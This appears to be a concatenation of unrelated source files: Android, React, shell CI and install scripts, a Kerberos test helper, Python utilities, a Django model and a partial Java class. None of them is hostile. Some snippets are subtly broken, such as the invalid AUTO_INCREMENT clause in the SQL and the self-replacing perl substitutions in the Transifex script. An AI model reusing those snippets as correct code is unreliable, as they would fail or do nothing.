import androidx.appcompat.app.AlertDialog;
import androidx.appcompat.app.AppCompatActivity;
import androidx.appcompat.app.AppCompatDelegate;
import androidx.cardview.widget.CardView;
import com.google.android.material.button.MaterialButtonToggleGroup;
import com.margsapp.messenger.R;
import java.util.Locale;
import java.util.Objects;
public class CustomiseActivity extends AppCompatActivity {
public static final String THEME = "0";
MaterialButtonToggleGroup materialButtonToggleGroup;
ImageView sun,default_settings,moon;
CardView lang_card;
int languageid;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_customize);
sun = findViewById(R.id.sun_img);
moon = findViewById(R.id.moon_img);
default_settings = findViewById(R.id.default_img);
sun.setVisibility(View.GONE);
moon.setVisibility(View.GONE);
default_settings.setVisibility(View.VISIBLE);
lang_card = findViewById(R.id.lang_card);
SharedPreferences preferences = getSharedPreferences("lang_settings", Activity.MODE_PRIVATE);
languageid = preferences.getInt("langid", 0);
androidx.appcompat.widget.Toolbar toolbar = findViewById(R.id.toolbar);
setSupportActionBar(toolbar);
Objects.requireNonNull(getSupportActionBar()).setTitle(getResources().getString(R.string.customize));
getSupportActionBar().setDisplayHomeAsUpEnabled(true);
toolbar.setNavigationOnClickListener(v -> startActivity(new Intent(CustomiseActivity.this,edit_profile.class).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)));
materialButtonToggleGroup = findViewById(R.id.btg_theme);
materialButtonToggleGroup.check(R.id.btnDefault);
loadData();
materialButtonToggleGroup.addOnButtonCheckedListener((group, checkedId, isChecked) -> {
if(checkedId == R.id.btnLight){
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_NO);
moon.setVisibility(View.GONE);
sun.setVisibility(View.VISIBLE);
default_settings.setVisibility(View.GONE);
SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
Editor editor = sharedPreferences.edit();
editor.putString(THEME, "2");
editor.apply();
}
if(checkedId == R.id.btnDark){
moon.setVisibility(View.VISIBLE);
default_settings.setVisibility(View.GONE);
sun.setVisibility(View.GONE);
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_YES);
SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
Editor editor = sharedPreferences.edit();
editor.putString(THEME, "1");
editor.apply();
}
if(checkedId == R.id.btnDefault){
moon.setVisibility(View.GONE);
default_settings.setVisibility(View.VISIBLE);
sun.setVisibility(View.GONE);
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_FOLLOW_SYSTEM);
SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
Editor editor = sharedPreferences.edit();
editor.putString(THEME, "0");
editor.apply();
}
});
lang_card.setOnClickListener(v -> showLanguageDialog());
}
private void showLanguageDialog() {
final String[] langitems = {"English (Default)","தமிழ்", "हिंदी","తెలుగు"};
AlertDialog.Builder dialog = new AlertDialog.Builder(this);
dialog.setTitle(getResources().getString(R.string.choose_language));
dialog.setSingleChoiceItems(langitems, languageid, (dialog1, i) -> {
if(i == 0){
setLocale("en",0);
recreate();
}
else if (i == 1){
setLocale("ta",1);
recreate();
}
else if(i==2){
setLocale("hi",2);
recreate();
}
else if(i == 3){
setLocale("te",3);
recreate();
}
dialog1.dismiss();
});
AlertDialog alertDialog = dialog.create();
alertDialog.show();
}
private void setLocale(String lang, int langid) {
Locale locale = new Locale(lang);
Locale.setDefault(locale);
Configuration config = new Configuration();
config.locale = locale;
getBaseContext().getResources().updateConfiguration(config, getBaseContext().getResources().getDisplayMetrics());
SharedPreferences.Editor editor = getSharedPreferences("lang_settings",MODE_PRIVATE).edit();
editor.putString("lang",lang);
editor.putInt("langid",langid);
editor.apply();
}
private void loadData() {
SharedPreferences preferences = getSharedPreferences("lang_settings", Activity.MODE_PRIVATE);
String language = preferences.getString("lang","");
int langid = preferences.getInt("langid", 0);
setLocale(language, langid);
SharedPreferences sharedPreferences = getSharedPreferences("theme", 0);
String Theme = sharedPreferences.getString(THEME, "");
if(Theme.equals("2")){
materialButtonToggleGroup.check(R.id.btnLight);
sun.setVisibility(View.VISIBLE);
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_NO);
moon.setVisibility(View.GONE);
default_settings.setVisibility(View.GONE);
}
if(Theme.equals("1")){
materialButtonToggleGroup.check(R.id.btnDark);
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_YES);
moon.setVisibility(View.VISIBLE);
default_settings.setVisibility(View.GONE);
sun.setVisibility(View.GONE);
}
if(Theme.equals("0")){
materialButtonToggleGroup.check(R.id.btnDefault);
AppCompatDelegate.setDefaultNightMode(AppCompatDelegate.MODE_NIGHT_FOLLOW_SYSTEM);
default_settings.setVisibility(View.VISIBLE);
moon.setVisibility(View.GONE);
sun.setVisibility(View.GONE);
}
}
@Override
public void onBackPressed() {
startActivity(new Intent(CustomiseActivity.this,edit_profile.class).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
}
}
|
#!/bin/bash
set -o errexit
set -o nounset
set -o pipefail
readonly CT_VERSION=latest
readonly KIND_VERSION=v0.11.1
readonly CLUSTER_NAME=chart-testing
readonly REPO_ROOT="${REPO_ROOT:-$(git rev-parse --show-toplevel)}"
find_latest_tag() {
if ! git describe --tags --abbrev=0 2>/dev/null; then
git rev-list --max-parents=0 --first-parent HEAD
fi
}
create_ct_container() {
echo "Starting Chart Testing container"
docker run --rm --interactive --detach --network host --name ct \
--volume "$(pwd)/.circleci/ct.yaml:/etc/ct/ct.yaml" \
--volume "$(pwd):/workdir" \
--workdir /workdir \
"quay.io/helmpack/chart-testing:${CT_VERSION}" \
cat
}
cleanup() {
echo "Removing ct container"
docker kill ct >/dev/null 2>&1 || true
}
docker_exec() {
docker exec --interactive --tty ct "$@"
}
create_kind_cluster() {
echo "Installing kind"
curl -sSLo kind "https://github.com/kubernetes-sigs/kind/releases/download/${KIND_VERSION}/kind-linux-amd64"
chmod +x kind
sudo mv kind /usr/local/bin/kind
echo "Creating cluster"
kind create cluster --name "${CLUSTER_NAME}" --wait 5m -q
echo "Copying kubeconfig to container"
local kubeconfig
kubeconfig="$(pwd)/kube-config"
kind get kubeconfig --name "${CLUSTER_NAME}" | tee "${kubeconfig}"
docker_exec mkdir -p /root/.kube
docker cp "${kubeconfig}" ct:/root/.kube/config
docker_exec kubectl cluster-info
docker_exec kubectl get nodes
}
install_local_path_provisioner() {
docker_exec kubectl delete storageclass standard
docker_exec kubectl apply -f "https://raw.githubusercontent.com/rancher/local-path-provisioner/master/deploy/local-path-storage.yaml"
}
install_charts() {
docker_exec ct install --all
echo
}
main() {
pushd "${REPO_ROOT}" >/dev/null
echo "Fetching tags"
git fetch --tags
local latest_tag
latest_tag=$(find_latest_tag)
local latest_tag_rev
latest_tag_rev=$(git rev-parse --verify "${latest_tag}")
echo "${latest_tag_rev} ${latest_tag} (latest tag)"
local head_rev
head_rev=$(git rev-parse --verify HEAD)
echo "${head_rev} HEAD"
if [[ "${latest_tag_rev}" == "${head_rev}" ]]; then
echo "No code changes. Nothing to release."
exit
fi
echo "Identifying changed charts since tag ${latest_tag}"
local changed_charts=()
readarray -t changed_charts <<< "$(git diff --find-renames --name-only "${latest_tag_rev}" | grep '\.yaml$' | cut -d '/' -f 1 | sort -u)"
if [[ -n "${changed_charts[*]}" ]]; then
local changes_pending=no
for chart in "${changed_charts[@]}"; do
if [[ -f "${chart}/Chart.yaml" ]]; then
changes_pending=yes
break
fi
done
if [[ "${changes_pending}" == "yes" ]]; then
create_ct_container
trap cleanup EXIT
create_kind_cluster
install_local_path_provisioner
install_charts
else
echo "Nothing to do. No chart changes detected."
fi
else
echo "Nothing to do. No chart changes detected."
fi
popd >/dev/null
}
main
|
<filename>src/components/UploadAttachmentButton/index.js<gh_stars>10-100
import UploadAttachmentButton from './UploadAttachmentButton'
import connector from './UploadAttachmentButton.connector'
export default connector(UploadAttachmentButton)
|
/**
* Created by AstafyevaLA on 24.04.2014.
*/
// loads taskLists, calendarLists, userName
var loader = new Loader();
// keeps the number of successfully added tasks and events to ask for mark
var markCounter = new MarkCounterBool(30, 365);
// dictionaries module
var spr = new Spr();
// popup win settings? that should be saved between popup win launches
var popupSettings = new PopupSettings();
// google analytics (for logging)
var _gaq;
var connectionOk = false;
/* updating icon and popup page */
function updateView() {
var isTokenOk = loader.TokenNotNull();
if (isTokenOk) {
chrome.browserAction.setIcon({ 'path' : '../images/daybyday16.png'});
chrome.browserAction.setPopup({popup : "views/Popup.html"});
loader.Load(false);
}
else {
chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
chrome.browserAction.setPopup({popup : "views/Popup.html"});
loader.Clear();
}
};
function updateViewNoLoad()
{
var isTokenOk = loader.TokenNotNull();
if (isTokenOk) {
chrome.browserAction.setIcon({ 'path' : '../images/daybyday16.png'});
chrome.browserAction.setPopup({popup : "views/Popup.html"});
}
else {
chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
chrome.browserAction.setPopup({popup : "views/Popup.html"});
}
connectionOk = isTokenOk;
}
/* Ask for taskLists, calendarLists, userName with select Google account*/
function AuthAndAskForTaskLists() {
loader.Load(true);
updateViewNoLoad();
}
/* Logs msg to console with current date and time*/
function LogMsg(message) {
console.log(GetDateTimeStr() + ' ' + message);
}
/* On Got Message event handler
When connection appears/disappears we should update view
*/
function OnGotMessage(request, sender, sendResponse) {
if (request.greeting && request.greeting == "token") {
updateView();
}
}
/* Background page initialization*/
function init () {
_gaq = _gaq || [];
_gaq.push(['_setAccount', c_analytics_code]);
(function() {
var ga = document.createElement('script');
ga.type = 'text/javascript';
ga.async = true;
/*ga.src = 'https://ssl.google-analytics.com/ga.js';*/
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(ga, s);
})();
updateView();
chrome.browserAction.setIcon({ 'path' : '../images/daybyday16gray.png'});
chrome.browserAction.onClicked.addListener(AuthAndAskForTaskLists);
chrome.runtime.onMessage.addListener(OnGotMessage);
loader.requestProcessor.onChangeConnectionState = updateView;
loader.requestProcessor.Authorize();
}
window.addEventListener('load', init, false);
// all are sent to Google Analytics
window.onerror = function(message, file, line) {
try {
_gaq.push(['_trackEvent', "Global", "Exception", file + "(" + line + "): " + message])
}
catch (e) {
LogMsg('gaq push exception error' + e)
}
}
// send event to Google Analytics
// string name - event name
// string params - event params
function trackEvent(name, params) {
try {
_gaq.push(['_trackEvent', name, params]);
}
catch (e) {
LogMsg('gaq push event error '+ e);
}
}
|
import React from 'react';
import Header from './Header';
import UserInfo from './UserInfo';
import Content from './Content';
import './css/Main.css';
class Main extends React.Component{
render(){
return(
<div className="main bg-dark">
<div className="main-header">
<Header/>
</div>
<div className="main-content">
<UserInfo/>
<Content/>
</div>
</div>
)
}
}
export default Main;
|
#!/bin/bash
# profiles = xccdf_org.ssgproject.content_profile_cui
# remediation = bash
. $SHARED/auditd_utils.sh
prepare_auditd_test_enviroment
set_parameters_value /etc/audit/auditd.conf "space_left_action" "halt"
|
#
# Original solution via StackOverflow:
# http://stackoverflow.com/questions/35802939/install-only-available-packages-using-conda-install-yes-file-requirements-t
#
#
# Install via `conda` directly.
# This will fail to install all
# dependencies. If one fails,
# all dependencies will fail to install.
#-------------------------------------------------------------------------------------------------------------
conda create -n py38 python=3.8
source activate py38
# ------------------------------------------------------------------------------------------------------------
conda install --yes --file requirements.txt
#
# To go around issue above, one can
# iterate over all lines in the
# requirements.txt file.
#
while read requirement; do conda install --yes $requirement; done < requirements.txt
# Registration Problem
pip install git+https://github.com/BioSpecNorway/IRmHiRegistration.git
# MRMR 4 best_practices in (Raman)Spectrsocopic DL
pip install git+https://github.com/smazzanti/mrmr |
/*eslint-disable*/
import React from "react";
// nodejs library to set properties for components
import PropTypes from "prop-types";
// nodejs library that concatenates classes
import classNames from "classnames";
// material-ui core components
import { List, ListItem } from "@material-ui/core";
import { makeStyles } from "@material-ui/core/styles";
import { Link } from "react-router-dom";
// @material-ui/icons
import Favorite from "@material-ui/icons/Favorite";
import styles from "assets/jss/material-kit-react/components/footerStyle.js";
const useStyles = makeStyles(styles);
export default function Footer(props) {
const classes = useStyles();
const { whiteFont } = props;
const footerClasses = classNames({
[classes.footer]: true,
[classes.footerWhiteFont]: whiteFont
});
const aClasses = classNames({
[classes.a]: true,
[classes.footerWhiteFont]: whiteFont
});
return (
<footer className={footerClasses}>
<div className={classes.container}>
<div className={classes.left}>
<List className={classes.list}>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=CPU" className={classes.block}>
[CPU]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=VENUS" className={classes.block}>
[VENUS]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=ERA" className={classes.block}>
[ERA]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=PROTO" className={classes.block}>
[PROTO]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=MINES" className={classes.block}>
[MINES]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<a href="/pool?id=CURIE" className={classes.block}>
[CURIE]
</a>
</ListItem>
<ListItem className={classes.inlineBlock}>
<Link to="/privacy-policy" className={classes.block}>
Privacy Policy
</Link>
</ListItem>
<ListItem className={classes.inlineBlock}>
<Link to="/cookie-policy" className={classes.block}>
Cookie Policy
</Link>
</ListItem>
</List>
</div>
<div className={classes.right}>
© {1900 + new Date().getYear()} made by{" "}
<a
href="#"
className={aClasses}
target="_blank"
>
Cardano Pools United
</a>
</div>
<div className={classes.left}>
The information on this site may contain errors or mistakes, please do your own research. Unofficial Cardano website.
Past performance is not indicative of future results. Any investment in blockchain assets involves the risk of loss of part or all of your investment. The value of the blockchain assets you exchange is subject to market and other investment risks.
</div>
</div>
</footer>
);
}
Footer.propTypes = {
whiteFont: PropTypes.bool
};
|
# Shell function library to initialize Kerberos credentials
#
# Note that while many of the functions in this library could benefit from
# using "local" to avoid possibly hammering global variables, Solaris /bin/sh
# doesn't support local and this library aspires to be portable to Solaris
# Bourne shell. Instead, all private variables are prefixed with "tap_".
#
# The canonical version of this file is maintained in the rra-c-util package,
# which can be found at <http://www.eyrie.org/~eagle/software/rra-c-util/>.
#
# Written by Russ Allbery <eagle@eyrie.org>
# Copyright 2009, 2010, 2011, 2012
# The Board of Trustees of the Leland Stanford Junior University
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# We use test_tmpdir.
. "${SOURCE}/tap/libtap.sh"
# Set up Kerberos, including the ticket cache environment variable. Bail out
# if not successful, return 0 if successful, and return 1 if Kerberos is not
# configured. Sets the global principal variable to the principal to use.
kerberos_setup () {
tap_keytab=`test_file_path config/keytab`
principal=`test_file_path config/principal`
principal=`cat "$principal" 2>/dev/null`
if [ -z "$tap_keytab" ] || [ -z "$principal" ] ; then
return 1
fi
KRB5CCNAME=`test_tmpdir`/krb5cc_test; export KRB5CCNAME
kinit --no-afslog -k -t "$tap_keytab" "$principal" >/dev/null </dev/null
status=$?
if [ $status != 0 ] ; then
kinit -k -t "$tap_keytab" "$principal" >/dev/null </dev/null
status=$?
fi
if [ $status != 0 ] ; then
kinit -t "$tap_keytab" "$principal" >/dev/null </dev/null
status=$?
fi
if [ $status != 0 ] ; then
kinit -k -K "$tap_keytab" "$principal" >/dev/null </dev/null
status=$?
fi
if [ $status != 0 ] ; then
bail "Can't get Kerberos tickets"
fi
return 0
}
# Clean up at the end of a test. Currently only removes the ticket cache.
kerberos_cleanup () {
tap_tmp=`test_tmpdir`
rm -f "$tap_tmp"/krb5cc_test
}
# List the contents of a keytab with enctypes and keys. This adjusts for the
# difference between MIT Kerberos (which uses klist) and Heimdal (which uses
# ktutil). Be careful to try klist first, since the ktutil on MIT Kerberos
# may just hang. Takes the keytab to list and the file into which to save the
# output, and strips off the header containing the file name.
ktutil_list () {
tap_tmp=`test_tmpdir`
if klist -keK "$1" > "$tap_tmp"/ktutil-tmp 2>/dev/null ; then
:
else
ktutil -k "$1" list --keys > "$tap_tmp"/ktutil-tmp </dev/null \
2>/dev/null
fi
sed -e '/Keytab name:/d' -e "/^[^ ]*:/d" "$tap_tmp"/ktutil-tmp > "$2"
rm -f "$tap_tmp"/ktutil-tmp
}
|
<html>
<head>
<title>People</title>
</head>
<body>
<table>
<tr>
<th>Name</th>
<th>Age</th>
<th>Address</th>
</tr>
<tr>
<td>Thomas</td>
<td>25</td>
<td>101 Main Street</td>
</tr>
<tr>
<td>Maria</td>
<td>35</td>
<td>145 Second Street</td>
</tr>
<tr>
<td>Joe</td>
<td>45</td>
<td>35 Wall Street</td>
</tr>
</table>
</body>
</html> |
import React, { useState } from 'react';
const Tabs = () => {
const [activeTab, setActiveTab] = useState(0);
return (
<div>
<div>
<button
onClick={() => setActiveTab(0)}
style={activeTab === 0 ? { fontWeight: 'bold' } : null}
>
Tab 1
</button>
<button
onClick={() => setActiveTab(1)}
style={activeTab === 1 ? { fontWeight: 'bold' } : null}
>
Tab 2
</button>
</div>
<div>
{activeTab === 0 ? <Tab1 /> : null}
{activeTab === 1 ? <Tab2 /> : null}
</div>
</div>
);
};
const Tab1 = () => <p>This is Tab 1</p>;
const Tab2 = () => <p>This is Tab 2</p>;
export default Tabs; |
#!/bin/bash
# What we get from Transifex is unusable and needs some fixing before we're able to use
# the translations.
FILE=$1
# Fix xliff tags
perl -i -pe 's/<xliff:g id=\\?"(.*?)?\\?">/<xliff:g id="\1">/g' $FILE
perl -i -pe 's/<\/xliff:g>/<\/xliff:g>/g' $FILE
# Escape single and double quotes before and after xliff tags
perl -i -pe 's/([^\\])(["'\''])<xliff/\1\\\2<xliff/g' $FILE
perl -i -pe 's/xliff:g>(["'\''])/xliff:g>\\\1/g' $FILE
# Restore "<" and ">"
perl -i -pe 's/&(lt|gt);/&\1;/g' $FILE
# <string ...></string> -> <string ... />
perl -i -pe 's/"><\/string>/"\/>/g' $FILE
# Escape single and double quotes (but not in comments or the xml tag)
perl -i -pe 's/([^\\])'\''/\1\\'\''/g unless /(<!--|xml)/' $FILE
# Fix escaped HTML in 'apg_learn_more'
perl -i -pe 's/<a href/<a href/g' $FILE
perl -i -pe 's/">/">/g' $FILE
perl -i -pe 's/<(\/?[a-z])>/<\1>/g' $FILE
|
import subprocess
import json
def query_cardano_tip(testnet_magic):
command = f"cardano-cli query tip --testnet-magic {testnet_magic}"
result = subprocess.run(command, shell=True, capture_output=True, text=True)
output = result.stdout.strip()
tip_info = json.loads(output)
slot_number = tip_info["slot"]
block_number = tip_info["block"]
tip_hash = tip_info["hash"]
return slot_number, block_number, tip_hash
testnet_magic_number = 1097911063
slot, block, tip_hash = query_cardano_tip(testnet_magic_number)
print(f"Slot Number: {slot}")
print(f"Block Number: {block}")
print(f"Tip Hash: {tip_hash}") |
import uuid
from django.db import models
class Preference(models.Model):
"""站点偏好"""
uuid = models.CharField(primary_key=True, max_length=36, default=uuid.uuid4)
name = models.CharField('网站名称', max_length=45)
update_time = models.DateTimeField(auto_now=True)
create_time = models.DateTimeField(auto_now_add=True)
logo_url = models.CharField('Logo', max_length=255, blank=True, null=True, default='')
favicon_url = models.CharField('favicon', max_length=255, blank=True, null=True, default='')
copyright = models.CharField('版权信息', max_length=1024, blank=True, null=True, default='')
record = models.CharField('备案信息', max_length=1024, blank=True, null=True, default='')
download_dir_max_size = models.BigIntegerField('zip下载大小限制(B)', default=-1)
download_dir_max_num = models.BigIntegerField('zip下载数量限制', default=-1)
default_total_size_limit = models.BigIntegerField('用户默认总大小限制(B)', default=-1)
allow_register = models.BooleanField('允许自主注册', default=True)
def __str__(self):
return self.name
class Meta:
db_table = 'preference'
verbose_name = '站点偏好'
verbose_name_plural = '站点偏好'
|
import Service from '@ember/service';
import Ember from 'ember';
export default Service.extend({
client:undefined,
urlStateService: Ember.inject.service(),
regionLocatorService: Ember.inject.service(),
init: function(){
this.setupSDK();
},
setupSDK: function(){
let state = this.get('urlStateService').cachedState();
let urlParams = new URLSearchParams(state);
let region = this.get('regionLocatorService').getRegion(urlParams.get('region'));
let client = new window.purecloud.apps.ClientApp({
pcEnvironment: `${region.domain}.${region.extension}`
});
this.set('client', client);
},
navigateToGroup: function(groupId){
this.get('client').directory.showGroup(groupId);
}
});
|
<reponame>petercunning/notebook<filename>CSW/geoportal-servicetype.py
# coding: utf-8
# In[ ]:
#Query Geoportal CSW to find COAWST data
# In[1]:
from owslib.csw import CatalogueServiceWeb
from owslib import fes
import numpy as np
# In[2]:
endpoint = 'http://www.ngdc.noaa.gov/geoportal/csw'
csw = CatalogueServiceWeb(endpoint,timeout=60)
print csw.version
# In[3]:
csw.get_operation_by_name('GetRecords').constraints
# In[4]:
val = 'COAWST'
filter1 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ filter1 ]
# In[5]:
csw.getrecords2(constraints=filter_list,maxrecords=100,esn='full')
print len(csw.records.keys())
for rec in list(csw.records.keys()):
print('title:'+csw.records[rec].title)
print('identifier:'+csw.records[rec].identifier)
print('modified:'+csw.records[rec].modified)
# In[6]:
choice=np.random.choice(list(csw.records.keys()))
print(csw.records[choice].title)
csw.records[choice].references
# ## Query Geoportal for all WMS endpoints
# In[7]:
val = 'wms'
filter1 = fes.PropertyIsLike(propertyname='apiso:ServiceType',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ filter1]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))
# ## Query Geoportal for COAWST and WMS endpoints
# In[8]:
val = 'wms'
filter1 = fes.PropertyIsLike(propertyname='apiso:ServiceType',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
val = 'COAWST'
filter2 = fes.PropertyIsLike(propertyname='apiso:AnyText',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ [filter1, filter2] ]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))
# In[9]:
for rec in list(csw.records.keys()):
print('title:'+csw.records[rec].title)
print('identifier:'+csw.records[rec].identifier)
print('modified:'+csw.records[rec].modified)
# In[11]:
val = 'Warner'
#val = 'COADS'
filter1 = fes.PropertyIsLike(propertyname='apiso:anyText',literal=('*%s*' % val),
escapeChar='\\',wildCard='*',singleChar='?')
filter_list = [ filter1 ]
csw.getrecords2(constraints=filter_list, maxrecords=1000)
print(len(csw.records.keys()))
for rec in list(csw.records.keys()):
print('title:'+csw.records[rec].title)
print('identifier:'+csw.records[rec].identifier)
print('modified:'+csw.records[rec].modified)
print(' ')
# In[ ]:
|
import sys
import subprocess
def execute_command(command):
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode != 0:
print(f"Error executing command: {command}")
print(stderr.decode('utf-8'))
sys.exit(1)
def main():
execute_command("make")
python_version = sys.version_info
if python_version.major == 2 and python_version.minor == 7:
execute_command("make check")
execute_command("make install")
if __name__ == "__main__":
main() |
import React, { useState } from 'react';
import axios from 'axios';
function BookSearch() {
const [query, setQuery] = useState('');
const [books, setBooks] = useState([]);
const searchBooks = async (e) => {
e.preventDefault();
const result = await axios.get(`https://www.googleapis.com/books/v1/volumes?q=${query}`);
setBooks(result.data.items);
}
return (
<form onSubmit={searchBooks}>
<input
type="text"
value={query}
onChange={(e) => setQuery(e.target.value)}
/>
<button type="submit">Search</button>
<ul>
{books.map(book => (
<li key={book.id}>
<img src={book.volumeInfo.imageLinks.thumbnail} alt="book cover" />
<div>
<h2>{book.volumeInfo.title}</h2>
<p>{book.volumeInfo.description}</p>
</div>
</li>
))}
</ul>
</form>
)
}
export default BookSearch; |
import re
def validatePassword(password, confirmPassword):
# Check if passwords match
if password != confirmPassword:
return False
# Check password strength criteria
if len(password) < 8:
return False
if not re.search(r"[A-Z]", password):
return False
if not re.search(r"[a-z]", password):
return False
if not re.search(r"\d", password):
return False
if not re.search(r"[!@#$%^&*]", password):
return False
return True
# Test cases
print(validatePassword("P@ssw0rd", "P@ssw0rd")) # Output: True
print(validatePassword("weak", "weak")) # Output: False |
#!/usr/bin/env bash
#fractional intensity should be determined prior running atlasBREX
#nohup siterate.sh &
echo "PID: $BASHPID"
for file in *'sj_'*'.nii.gz'*
do
btemplate=b_T1_2weeks.nii.gz
nbtemplate=nb_T1_2weeks.nii.gz
#remove 'sj'
name=$(echo $file | cut -d "_" -f2- )
#atlasBREX: FNIRT
bash atlasBREX.sh -b $btemplate -nb $nbtemplate -h $file -f 0.8 -reg 1 -w 5,5,5 -msk a,0,0
wait
#remove prefix and rename
mv -f ${file%%.*}_brain.nii.gz FNIRT_${name%%.*}_brain.nii.gz
mv -f ${file%%.*}_brain_lin.nii.gz FLIRT_${name%%.*}_brain_lin.nii.gz
#remove warp files and matrix
rm -f *std2high*
wait
#atlasBREX: ANTs/SyN
bash atlasBREX.sh -b $btemplate -nb $nbtemplate -h $file -f 0.8 -reg 2 -w 1 -msk a,0,0
wait
#remove prefix and rename
mv -f ${file%%.*}_brain.nii.gz SyN_${name%%.*}_brain.nii.gz
mv -f ${file%%.*}_brain_lin.nii.gz ANTS_${name%%.*}_brain_lin.nii.gz
#remove warp files and matrix
rm -f *std2high*
wait
done
|
import * as React from "react";
import { addons, types } from "@storybook/addons";
import { AddonPanel } from "@storybook/components";
import { ADDON_ID, PANEL_ID, PARAM_KEY } from "./constants";
import { Panel } from "./panel";
addons.register(ADDON_ID, () => {
addons.add(PANEL_ID, {
title: "Abstract",
type: types.PANEL,
render: ({ active, key }) => (
<AddonPanel active={active} key={key}>
<Panel />
</AddonPanel>
),
paramKey: PARAM_KEY
});
}); |
CREATE TABLE `task` (
`id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1,
`title` varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL,
`priority` int(1) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
ALTER TABLE `task`
ADD PRIMARY KEY (`id`); |
<gh_stars>1-10
package align2;
import java.util.ArrayList;
import stream.SiteScore;
/**
* @author <NAME>
* @date Oct 15, 2013
*
*/
public abstract class AbstractIndex {
AbstractIndex(int keylen, int kfilter, int pointsMatch, int minChrom_, int maxChrom_, MSA msa_){
KEYLEN=keylen;
KEYSPACE=1<<(2*KEYLEN);
BASE_KEY_HIT_SCORE=pointsMatch*KEYLEN;
KFILTER=kfilter;
msa=msa_;
minChrom=minChrom_;
maxChrom=maxChrom_;
assert(minChrom==MINCHROM);
assert(maxChrom==MAXCHROM);
assert(minChrom<=maxChrom);
}
final int count(int key){
// assert(false);
if(COUNTS!=null){return COUNTS[key];} //TODO: Benchmark speed and memory usage with counts=null. Probably only works for single-block genomes.
// assert(false);
final Block b=index[0];
final int rkey=KeyRing.reverseComplementKey(key, KEYLEN);
int a=b.length(key);
return key==rkey ? a : a+b.length(rkey);
}
static final boolean overlap(int a1, int b1, int a2, int b2){
assert(a1<=b1 && a2<=b2) : a1+", "+b1+", "+a2+", "+b2;
return a2<=b1 && b2>=a1;
}
/** Is (a1, b1) within (a2, b2) ? */
static final boolean isWithin(int a1, int b1, int a2, int b2){
assert(a1<=b1 && a2<=b2) : a1+", "+b1+", "+a2+", "+b2;
return a1>=a2 && b1<=b2;
}
/** Generates a term that increases score with how far apart the two farthest perfect matches are.
* Assumes that the centerIndex corresponds to the leftmost perfect match. */
final int scoreY(int[] locs, int centerIndex, int offsets[]){
int center=locs[centerIndex];
// int rightIndex=centerIndex;
// for(int i=centerIndex; i<offsets.length; i++){
// if(locs[i]==center){
// rightIndex=i;
// }
// }
int rightIndex=-1;
for(int i=offsets.length-1; rightIndex<centerIndex; i--){
if(locs[i]==center){
rightIndex=i;
}
}
//Assumed to not be necessary.
// for(int i=0; i<centerIndex; i++){
// if(locs[i]==center){
// centerIndex=i;
// }
// }
return offsets[rightIndex]-offsets[centerIndex];
}
abstract float[] keyProbArray();
abstract byte[] getBaseScoreArray(int len, int strand);
abstract int[] getKeyScoreArray(int len, int strand);
abstract int maxScore(int[] offsets, byte[] baseScores, int[] keyScores, int readlen, boolean useQuality);
public abstract ArrayList<SiteScore> findAdvanced(byte[] basesP, byte[] basesM, byte[] qual, byte[] baseScoresP, int[] keyScoresP, int[] offsets, long id);
long callsToScore=0;
long callsToExtendScore=0;
long initialKeys=0;
long initialKeyIterations=0;
long initialKeys2=0;
long initialKeyIterations2=0;
long usedKeys=0;
long usedKeyIterations=0;
static final int HIT_HIST_LEN=40;
final long[] hist_hits=new long[HIT_HIST_LEN+1];
final long[] hist_hits_score=new long[HIT_HIST_LEN+1];
final long[] hist_hits_extend=new long[HIT_HIST_LEN+1];
final int minChrom;
final int maxChrom;
